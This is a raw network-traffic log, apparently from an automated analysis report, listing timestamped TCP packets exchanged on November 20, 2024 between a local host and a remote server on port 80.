                                                                                                      Nov 20, 2024 09:36:11.119699001 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.119894028 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.119908094 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.119920969 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.119935989 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.119942904 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.119951963 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.119992018 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.119992018 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.121925116 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.121985912 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.121999979 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.122029066 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.122093916 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.122107983 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.122129917 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.167342901 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.167821884 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.167834044 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.167999029 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.202717066 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.202728987 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.202773094 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.244957924 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.245074034 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.245109081 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.245141983 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.245142937 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.245177984 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.245184898 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.292355061 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:18.931716919 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:18.933262110 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:18.936885118 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:18.936966896 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:18.938193083 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:18.938357115 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:18.938357115 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:18.943212032 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.642822027 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.642836094 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.642970085 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.643188000 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.643238068 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.643249035 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.643292904 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.643346071 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.643357992 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.643368959 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.643423080 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.643423080 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.643455029 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.643470049 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.643517017 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.647834063 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.647864103 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.647872925 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.648008108 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.770831108 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.770843983 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.770854950 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.770867109 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.770957947 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.770997047 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.771003008 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.771013021 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.771060944 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.771155119 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.771632910 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.771783113 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.771792889 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.771970034 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.771981955 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.771995068 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.772006989 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.772034883 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.772034883 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.772162914 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.772211075 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.772723913 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.772743940 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.772764921 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.772782087 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.772815943 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.772815943 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.772886992 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.772907019 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.772949934 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.773766994 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.773785114 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.773802042 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.773914099 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.778523922 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.778659105 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.778686047 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.823676109 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.857625008 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.893448114 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.893481970 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.893498898 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.893503904 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.893532038 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.893536091 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.893599033 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.893625975 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.893640995 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.893642902 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.893672943 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.893759966 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.893774986 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.893785000 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.893826962 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.893851042 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.893901110 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.894567966 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.894596100 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.894612074 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.894639969 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.894745111 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.894759893 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.894776106 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.894783020 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.894792080 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.894807100 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.895561934 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.895589113 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.895603895 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.895603895 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.895620108 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.895637989 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.895647049 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.895663023 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.895679951 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.895684004 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.895714045 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.896316051 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.896375895 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.896393061 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.896426916 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.896467924 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.896485090 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.896500111 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.896508932 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.896517992 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.896537066 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.897219896 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.897265911 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.897290945 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.897305965 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.897342920 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.897383928 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.897398949 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.897413015 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.897428989 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.897437096 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.897464991 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.898121119 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.898147106 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.898160934 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.898183107 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.898260117 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.898274899 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.898289919 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.898298979 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.898308039 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.898325920 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.948648930 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.991029978 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.991050005 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.991065979 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.991082907 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:19.991154909 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:19.991189003 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.018893957 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.018913984 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.018939972 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.018955946 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.018970966 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.018987894 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.019021988 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.019056082 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.019289017 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.019366026 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.019428015 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.019500971 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.019567966 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.019582987 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.019603014 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.019805908 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.019850016 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.019880056 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.019896984 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.019936085 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.019984007 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.019999027 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.020030022 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.020035028 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.020519018 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.020555019 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.020576954 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.020592928 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.020627975 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.020728111 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.020745039 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.020759106 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.020775080 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.020786047 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.020813942 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.021410942 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.021464109 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.021478891 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.021507978 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.021619081 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.021635056 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.021651983 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.021661997 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.021671057 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.021692991 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.022332907 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.022380114 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.022391081 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.022407055 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.022442102 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.022540092 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.022556067 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.022569895 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.022584915 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.022595882 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.022629976 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.023197889 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.023247957 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.023262978 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.023293018 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.023569107 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.023583889 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.023600101 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.023610115 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.023616076 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.023634911 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.024095058 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.024137974 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.024147034 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.024163008 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.024200916 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.024269104 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.024285078 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.024298906 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.024313927 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.024323940 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.024358988 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.024996042 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.025022030 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.025037050 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.025063992 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.025139093 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.025155067 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.025168896 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.025177002 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.025186062 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.025202990 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.025901079 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.025955915 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.026005983 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.026058912 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.026073933 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.026093960 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.026133060 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.026148081 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.026164055 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.026170015 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.026196003 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.026252985 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.026932955 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.026977062 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.026992083 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.026993036 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.027025938 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.027036905 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.027072906 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.027089119 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.027103901 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.027112961 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.027136087 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.027829885 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.027858973 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.027874947 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.027904987 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.027925014 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.027987957 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.028053045 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.073649883 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.083175898 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.083197117 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.083214045 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.083235025 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.083277941 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.083296061 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.083323956 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.108429909 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.108450890 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.108469009 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.108489990 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.108515978 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.108532906 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.108549118 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.108601093 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.108725071 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.108741999 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.108756065 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.108772993 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.108782053 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.108788013 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.108804941 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.108810902 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.108844042 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.108875036 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.108891964 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.108925104 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.109323978 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.146480083 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.146502972 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.146521091 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.146534920 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.146557093 CET4972680192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:20.146583080 CET804972691.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:20.146600008 CET804972691.202.233.169192.168.2.7
